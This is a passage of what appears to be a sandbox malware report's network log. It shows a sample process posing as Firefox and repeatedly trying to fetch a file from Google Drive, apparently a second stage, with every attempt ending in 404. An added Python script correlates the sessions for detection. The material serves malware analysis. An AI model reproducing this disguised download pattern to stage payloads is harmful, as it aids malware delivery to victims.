                                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                        Content-Length: 1652
                                                                        Server: UploadServer
                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                        Connection: close
2025-01-10 15:02:38 UTC | 1652 | IN | Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 59 56 66 78 65 45 41 34 48 4b 6a 4a 43 72 53 65 44 6a 51 39 4a 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="YVfxeEA4HKjJCrSeDjQ9Jg">*{margin:0;padding:0}html,code{font:15px/22px arial


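Sessions 0 to 3 above show the sample process (PID 2900, not a browser) asking drive.google.com for a file by id, following the 303 to drive.usercontent.google.com, receiving a 404, and repeating the pair about twelve seconds later. The script below is an added example, not part of the Joe Sandbox report or of the sample: it transcribes those four sessions and the DNS answer table into Python records (response headers trimmed to the fields that are inspected; all function and variable names are my own) and derives what an analyst would pull from this log, namely the Drive file id, the number of download attempts and the spacing between them, whether any attempt actually returned a payload, whether each session's destination IP matches what the sandbox resolver returned for its Host header, and whether a Firefox User-Agent is being sent by a process that is not Firefox.

```python
"""Correlate the HTTPS sessions and DNS answers of this report.
Added example, not part of the Joe Sandbox report or the sample: the records
are transcribed from sessions 0-3 and the DNS answer table above (response
headers trimmed to what is inspected); function and variable names are mine."""
from collections import namedtuple
from datetime import datetime
from urllib.parse import parse_qs, urlparse

PROC = r"C:\Users\user\Desktop\Osb7hkGfAb.exe"
UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0"
FILE_ID = "1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4"   # the id= value in the request URLs
DNS_ANSWERS = {"drive.google.com": "142.250.184.238",          # DNS answer table
               "drive.usercontent.google.com": "142.250.186.97"}

# ts = request timestamp (UTC) as printed; request/response = raw HTTP heads
Session = namedtuple("Session", "sid ts dst_ip process request response")

def _req(path, host):
    return (f"GET {path} HTTP/1.1\r\nUser-Agent: {UA}\r\nHost: {host}\r\n"
            "Cache-Control: no-cache\r\n\r\n")

UC_PATH = f"/uc?export=download&id={FILE_ID}"
DL_PATH = f"/download?id={FILE_ID}&export=download"
REDIRECT = ("HTTP/1.1 303 See Other\r\nContent-Type: application/binary\r\n"
            f"Location: https://drive.usercontent.google.com{DL_PATH}\r\n"
            "Server: ESF\r\nContent-Length: 0\r\nConnection: close\r\n\r\n")
NOT_FOUND = ("HTTP/1.1 404 Not Found\r\nContent-Type: text/html; charset=utf-8\r\n"
             "Content-Length: 1652\r\nServer: UploadServer\r\nConnection: close\r\n\r\n")
SESSIONS = [
    Session(0, "2025-01-10 15:02:24", "142.250.184.238", PROC,
            _req(UC_PATH, "drive.google.com"), REDIRECT),
    Session(1, "2025-01-10 15:02:25", "142.250.186.97", PROC,
            _req(DL_PATH, "drive.usercontent.google.com"), NOT_FOUND),
    Session(2, "2025-01-10 15:02:36", "142.250.184.238", PROC,
            _req(UC_PATH, "drive.google.com"), REDIRECT),
    Session(3, "2025-01-10 15:02:38", "142.250.186.97", PROC,
            _req(DL_PATH, "drive.usercontent.google.com"), NOT_FOUND),
]

def parse_head(raw):
    """Split an HTTP head into (start line, {lower-cased header: value})."""
    lines = raw.split("\r\n\r\n", 1)[0].split("\r\n")
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            k, v = line.split(":", 1)
            headers[k.strip().lower()] = v.strip()
    return lines[0], headers

def status_code(raw):
    return int(parse_head(raw)[0].split()[1])

def drive_file_id(url_or_path):
    """The id= parameter of a Drive /uc or /download URL, or None."""
    return parse_qs(urlparse(url_or_path).query).get("id", [None])[0]

def download_attempts(sessions):
    """Group sessions into attempts: a redirect plus the fetch of its Location."""
    attempts, ordered, i = [], sorted(sessions, key=lambda s: s.sid), 0
    while i < len(ordered):
        s = ordered[i]
        start, req = parse_head(s.request)
        code, resp = status_code(s.response), parse_head(s.response)[1]
        attempt = {"start": s.ts, "hosts": [req["host"]], "codes": [code],
                   "file_id": drive_file_id(start.split()[1])}
        loc, i = urlparse(resp.get("location", "")), i + 1
        if code in (301, 302, 303, 307, 308) and i < len(ordered):
            nstart, nreq = parse_head(ordered[i].request)
            if nreq.get("host") == loc.netloc and nstart.split()[1] == f"{loc.path}?{loc.query}":
                attempt["hosts"].append(nreq["host"])
                attempt["codes"].append(status_code(ordered[i].response))
                i += 1
        attempts.append(attempt)
    return attempts

def dns_mismatches(sessions, dns):
    """Session ids whose destination IP is not the resolver's answer for Host."""
    return [s.sid for s in sessions
            if dns.get(parse_head(s.request)[1].get("host")) != s.dst_ip]

def browser_ua_from_non_browser(sessions):
    """True when a process that is not Firefox sends a Firefox User-Agent."""
    return any("firefox/" in parse_head(s.request)[1].get("user-agent", "").lower()
               and not s.process.lower().endswith("firefox.exe") for s in sessions)

def summarize(sessions, dns):
    attempts = download_attempts(sessions)
    ts = [datetime.strptime(a["start"], "%Y-%m-%d %H:%M:%S") for a in attempts]
    return {"file_ids": sorted({a["file_id"] for a in attempts if a["file_id"]}),
            "attempts": len(attempts),
            "payload_retrieved": any(a["codes"][-1] == 200 for a in attempts),
            "retry_intervals_s": [int((b - a).total_seconds()) for a, b in zip(ts, ts[1:])],
            "dns_mismatches": dns_mismatches(sessions, dns),
            "browser_ua_from_non_browser": browser_ua_from_non_browser(sessions)}

if __name__ == "__main__":
    for k, v in summarize(SESSIONS, DNS_ANSWERS).items():
        print(f"{k}: {v}")
```

Run as-is, the summary reports two attempts twelve seconds apart that both end in 404, so the second stage was never retrieved in this run and there is nothing to carve from the capture; the file id and the two Drive hosts are the indicators worth recording, while the Firefox User-Agent sent by a process that is not Firefox is the detection angle that survives a change of file id.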
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.10 | 49856 | 142.250.184.238 | 443 | 2900 | C:\Users\user\Desktop\Osb7hkGfAb.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 15:02:49 UTC | 417 | OUT | GET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                        Host: drive.google.com
                                                                        Cache-Control: no-cache
                                                                        Cookie: NID=520=NzMsYMa1hwFGHWXncS201MzV8PFMwSf_3qyvCmc5HJg3R3sO1qOPypewvliZYpdKZNCCmXBtsFfacvKWJvxX41yTpmywHEYlWCgQIoQ69oecTDWIRtQQMmkbltULqdlZt_oGviswB68cFN_JFfOg5AnucRBuGDMzy36q3C4c2OKHSrcU19ksRYE
2025-01-10 15:02:49 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                        Content-Type: application/binary
                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                        Pragma: no-cache
                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                        Date: Fri, 10 Jan 2025 15:02:49 GMT
                                                                        Location: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download
                                                                        Strict-Transport-Security: max-age=31536000
                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                        Content-Security-Policy: script-src 'nonce-FHT5QmTJSjAKeWAkXesi1w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                        Server: ESF
                                                                        Content-Length: 0
                                                                        X-XSS-Protection: 0
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        X-Content-Type-Options: nosniff
                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.10 | 49866 | 142.250.186.97 | 443 | 2900 | C:\Users\user\Desktop\Osb7hkGfAb.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 15:02:50 UTC | 459 | OUT | GET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                        Cache-Control: no-cache
                                                                        Host: drive.usercontent.google.com
                                                                        Connection: Keep-Alive
                                                                        Cookie: NID=520=NzMsYMa1hwFGHWXncS201MzV8PFMwSf_3qyvCmc5HJg3R3sO1qOPypewvliZYpdKZNCCmXBtsFfacvKWJvxX41yTpmywHEYlWCgQIoQ69oecTDWIRtQQMmkbltULqdlZt_oGviswB68cFN_JFfOg5AnucRBuGDMzy36q3C4c2OKHSrcU19ksRYE
2025-01-10 15:02:50 UTC  1851               IN         HTTP/1.1 404 Not Found
                                                                        X-GUploader-UploadID: AFiumC62X_j2AzHGbO8sj7XjJTFZtTRtfC7f6sQRh5GaHFjevS_Yx5RDK6YGPeq1EV58JJEEb8Wf88o
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                        Pragma: no-cache
                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                        Date: Fri, 10 Jan 2025 15:02:50 GMT
                                                                        Content-Security-Policy: script-src 'nonce-jjnXb5ZA8edhQ2NKVGbbaA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                        Content-Length: 1652
                                                                        Server: UploadServer
                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                        Connection: close
                                                                        2025-01-10 15:02:50 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 52 53 75 33 51 4f 41 4a 76 74 74 66 67 67 47 5a 65 6e 79 36 77 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="RSu3QOAJvttfggGZeny6wQ">*{margin:0;padding:0}html,code{font:15px/22px arial


Session ID  Source IP     Source Port  Destination IP   Destination Port  PID   Process
6           192.168.2.10  49933        142.250.184.238  443               2900  C:\Users\user\Desktop\Osb7hkGfAb.exe

Timestamp                Bytes transferred  Direction  Data
2025-01-10 15:03:01 UTC  417                OUT        GET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                        Host: drive.google.com
                                                                        Cache-Control: no-cache
                                                                        Cookie: NID=520=NzMsYMa1hwFGHWXncS201MzV8PFMwSf_3qyvCmc5HJg3R3sO1qOPypewvliZYpdKZNCCmXBtsFfacvKWJvxX41yTpmywHEYlWCgQIoQ69oecTDWIRtQQMmkbltULqdlZt_oGviswB68cFN_JFfOg5AnucRBuGDMzy36q3C4c2OKHSrcU19ksRYE
2025-01-10 15:03:01 UTC  1920               IN         HTTP/1.1 303 See Other
                                                                        Content-Type: application/binary
                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                        Pragma: no-cache
                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                        Date: Fri, 10 Jan 2025 15:03:01 GMT
                                                                        Location: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download
                                                                        Strict-Transport-Security: max-age=31536000
                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                        Content-Security-Policy: script-src 'nonce-qdfnFdtn4QFjMpUVBxAHbw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                        Server: ESF
                                                                        Content-Length: 0
                                                                        X-XSS-Protection: 0
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        X-Content-Type-Options: nosniff
                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                        Connection: close


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
7           192.168.2.10  49941        142.250.186.97  443               2900  C:\Users\user\Desktop\Osb7hkGfAb.exe

Timestamp                Bytes transferred  Direction  Data
2025-01-10 15:03:02 UTC  459                OUT        GET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                        Cache-Control: no-cache
                                                                        Host: drive.usercontent.google.com
                                                                        Connection: Keep-Alive
                                                                        Cookie: NID=520=NzMsYMa1hwFGHWXncS201MzV8PFMwSf_3qyvCmc5HJg3R3sO1qOPypewvliZYpdKZNCCmXBtsFfacvKWJvxX41yTpmywHEYlWCgQIoQ69oecTDWIRtQQMmkbltULqdlZt_oGviswB68cFN_JFfOg5AnucRBuGDMzy36q3C4c2OKHSrcU19ksRYE
2025-01-10 15:03:02 UTC  1851               IN         HTTP/1.1 404 Not Found
                                                                        X-GUploader-UploadID: AFiumC5C-XCaBhbKj5iBfDncOXFZhBwXDtN31UUNg5ZXZGA01I65pplHHMPAI9D4adid0IuhadaDd7Q
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                        Pragma: no-cache
                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                        Date: Fri, 10 Jan 2025 15:03:02 GMT
                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                        Content-Security-Policy: script-src 'nonce-hJq8jcQonabOgYIAYTB57Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                        Content-Length: 1652
                                                                        Server: UploadServer
                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                        Connection: close
                                                                        2025-01-10 15:03:02 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 38 66 61 76 55 51 30 6d 46 6f 41 33 70 59 7a 70 36 30 2d 6e 30 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="8favUQ0mFoA3pYzp60-n0w">*{margin:0;padding:0}html,code{font:15px/22px arial


Session ID  Source IP     Source Port  Destination IP   Destination Port  PID   Process
8           192.168.2.10  49981        142.250.184.238  443               2900  C:\Users\user\Desktop\Osb7hkGfAb.exe

Timestamp                Bytes transferred  Direction  Data
2025-01-10 15:03:13 UTC  417                OUT        GET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                        Host: drive.google.com
                                                                        Cache-Control: no-cache
                                                                        Cookie: NID=520=NzMsYMa1hwFGHWXncS201MzV8PFMwSf_3qyvCmc5HJg3R3sO1qOPypewvliZYpdKZNCCmXBtsFfacvKWJvxX41yTpmywHEYlWCgQIoQ69oecTDWIRtQQMmkbltULqdlZt_oGviswB68cFN_JFfOg5AnucRBuGDMzy36q3C4c2OKHSrcU19ksRYE
2025-01-10 15:03:13 UTC  1920               IN         HTTP/1.1 303 See Other
                                                                        Content-Type: application/binary
                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                        Pragma: no-cache
                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                        Date: Fri, 10 Jan 2025 15:03:13 GMT
                                                                        Location: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download
                                                                        Strict-Transport-Security: max-age=31536000
                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                        Content-Security-Policy: script-src 'nonce-Oxr7MkhGqoIfYqsBAgvvmw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                        Server: ESF
                                                                        Content-Length: 0
                                                                        X-XSS-Protection: 0
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        X-Content-Type-Options: nosniff
                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                        Connection: close


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
9           192.168.2.10  49982        142.250.186.97  443               2900  C:\Users\user\Desktop\Osb7hkGfAb.exe

Timestamp                Bytes transferred  Direction  Data
2025-01-10 15:03:14 UTC  459                OUT        GET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                        Cache-Control: no-cache
                                                                        Host: drive.usercontent.google.com
                                                                        Connection: Keep-Alive
                                                                        Cookie: NID=520=NzMsYMa1hwFGHWXncS201MzV8PFMwSf_3qyvCmc5HJg3R3sO1qOPypewvliZYpdKZNCCmXBtsFfacvKWJvxX41yTpmywHEYlWCgQIoQ69oecTDWIRtQQMmkbltULqdlZt_oGviswB68cFN_JFfOg5AnucRBuGDMzy36q3C4c2OKHSrcU19ksRYE
2025-01-10 15:03:15 UTC  1851               IN         HTTP/1.1 404 Not Found
                                                                        X-GUploader-UploadID: AFiumC4ViZTyhzcRvA2jPbZMnMrDGnM-KBu5A7i9uc2RXwRp9rCoWr3Ewt4qgbdLaeCw5oNu3RPsAm0
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                        Pragma: no-cache
                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                        Date: Fri, 10 Jan 2025 15:03:14 GMT
                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                        Content-Security-Policy: script-src 'nonce-dmpUTmAVGiz3ysuOg9arxQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                        Content-Length: 1652
                                                                        Server: UploadServer
                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                        Connection: close
